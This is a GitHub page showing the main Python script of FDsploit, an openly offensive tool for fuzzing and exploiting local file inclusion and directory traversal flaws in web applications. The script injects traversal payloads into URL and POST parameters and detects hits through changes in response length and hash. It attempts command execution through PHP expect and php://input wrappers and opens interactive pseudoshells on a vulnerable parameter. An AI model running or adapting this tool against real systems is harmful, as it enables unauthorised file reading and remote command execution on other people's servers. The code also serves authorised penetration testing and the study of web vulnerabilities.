This repository has been archived by the owner on Feb 15, 2022. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 77
/
fdsploit.py
executable file
·144 lines (135 loc) · 6.49 KB
/
fdsploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Christophoros Petrou (game0ver)'
__description__ = 'FDsploit.py: File inclusion & directory traversal fuzzer/enumeration & exploitation framework'
__version__ = '1.2'
import sys
import importlib
importlib.reload(sys)
from core.menu import *
from core.utils import *
from core.colors import *
from core.banners import *
from core.lfishells import *
from core.validations import *
warnings.filterwarnings("ignore")
# define some globals
CUSTOM = False
HOST, PORT = None, None
USER_AGENT = 'FDsploit_{}_agent'.format(__version__)
def LFIshell(shell_type, url, verb, cookie, tchar, proxy, b64, uenc, parameters=None):
"""LFI pseudoshell"""
try:
param = str(raw_input(">> Vulnerable parameter: ")).strip()
if param:
if shell_type == "simple":
simple_shell(verb, url, param, cookie, proxy, tchar, b64, uenc, parameters)
if shell_type == "expect":
expect_shell(verb, url, param, cookie, proxy, parameters)
if shell_type == "input":
input_shell(verb, url, param, cookie, proxy)
else:
sys.exit(0)
except KeyboardInterrupt:
sys.exit(0)
def Fuzzer(url, verb, cookie, depth, payload, tchar, proxy, b64, uenc, keyword, cmd, parameters, custom=False):
"""main fuzzer"""
try:
if verb == "GET":
_url = Url(url)
print("\n{0}[+]{1} Url: {2}".format(BT, S, url))
if custom:
params = _url.wildcardParams()
print("{0}[+]{1} Wildcard Mode: {2}ON{1}".format(BT,S,FG))
else:
params = _url.detect()
print("{0}[+]{1} Wildcard Mode: {2}OFF{1}".format(BT,S,FR))
if verb == 'POST':
if custom:
params = wildcardPostParams(parameters)
else:
params = parameters.keys()
init_req = req(verb, url, cookie, proxy, parameters)
initialLength = getLen(init_req.content)
initialHash = hashpage(init_req.content)
print("{0}[+]{1} Initial content length: {2}".format(BT,S,BT+str(initialLength)+S))
try:
print("{0}[*]{3} {2}{1}{4}{3}{2} parameters detected:{3}".format(BT,FC,UN,S,len(params)))
except TypeError: pass
if params:
for p in params: print("• {}".format(p))
for param in params:
print("\n{0}[*]{1} {2}Checking {0}{2}{3}{1}{2} parameter{1}".format(FG,S,UN,param))
counter = 0
while counter <= depth:
query = createQuery(b64, uenc, tchar, counter, payload)
if verb == 'POST':
parameters[param] = query
ans = req(verb, url, cookie, proxy, parameters)
else:
ans = req(verb, inject(url, param, query), cookie, proxy)
if ans.status_code == 200:
pagehash = hashpage(ans.text)
contentLength = getLen(ans.text)
print("{} ❯ Payload: {}".format(FC+str(ans.status_code)+S, FC+query+S))
if contentLength != initialLength:
print(" ╚═[ Content-length ❯ {}".format(FG+str(contentLength)+S))
print(" ╚═[ Page signature ❯ {}...{}".format(FG+pagehash[:5],FG+pagehash[-5:]+S))
if keyword:
if keyword in ans.text: print(' ╚═> Found Keyword: "{}{}{}"!'.format(FG, keyword, S))
else:
print(" ╚═[ Content-length ❯ {}".format(FC+str(contentLength)+S))
print(" ╚═[ Page signature ❯ {}...{}".format(pagehash[:5],pagehash[-5:]))
# rare but not completely impossible...
if keyword:
if keyword in ans.text: print(' ╚═> Found Keyword: "{}{}{}"!'.format(FG, keyword, S))
else:
print("[ {} ❯ Payload: {}".format(FR+str(ans.status_code)+S, query))
counter += 1
if cmd:
for param in params:
print("\n• {1}Trying command execution with '{0}{3}{2}{1}' parameter:{2}".format(BT, UN, S, param))
test_php_expect(cmd, verb, url, param, cookie, proxy, parameters)
test_php_input(cmd, verb, url, param, cookie, proxy)
else:
print("[x] No parameters detected!")
except KeyboardInterrupt:
sys.exit(0)
if __name__ == '__main__':
banner()
args = console()
if args.url or args.file:
if args.payload.startswith('/'): args.payload = args.payload[1:]
if args.useragent: USER_AGENT = genUA()
if args.proxy: HOST, PORT = args.proxy.split(':')
if args.verb == 'POST' and args.params == None:
print("{}\n[!] POST request requires the parameters to be specified!\n")
sys.exit(0)
if args.url:
if args.lfishell:
if args.url:
LFIshell(args.lfishell, args.url, args.verb, args.cookie, args.tchar, args.proxy, args.b64, int(args.urlencode), args.params)
else:
print("\n{}[x] A url must be specified!{}".format(BR, S))
sys.exit(0)
else:
# check if a custom parameter is specified --> if YES --> WILDCARD mode ON
if '*' in args.url: CUSTOM=True
if args.params:
if '*' in args.params.values():
CUSTOM = True
Fuzzer(args.url, args.verb, args.cookie, args.depth, args.payload, args.tchar, args.proxy, args.b64, int(args.urlencode), args.keyword, args.cmd, args.params, custom=CUSTOM)
elif args.file:
if args.verb == "POST":
print("{}\n[x]{} Can't use the --file option with POST verb!".format(FR,S))
sys.exit(0)
urls = extracturls(args.file)
if urls:
for url in urls:
if '*' in url: CUSTOM=True
Fuzzer(url, args.verb, args.cookie, args.depth, args.payload, args.tchar, args.proxy, args.b64, int(args.urlencode), args.keyword, args.cmd, args.params, custom=CUSTOM)
else:
print("""usage: fdsploit.py [-u | -f ] [-h] [-p] [-d] [-e {0,1,2}] [-t] [-b] [-x] [-c]
[-v] [--params [...]] [-k] [-a] [--cmd]
[--lfishell {None,simple,expect,input}]""")
#_EOF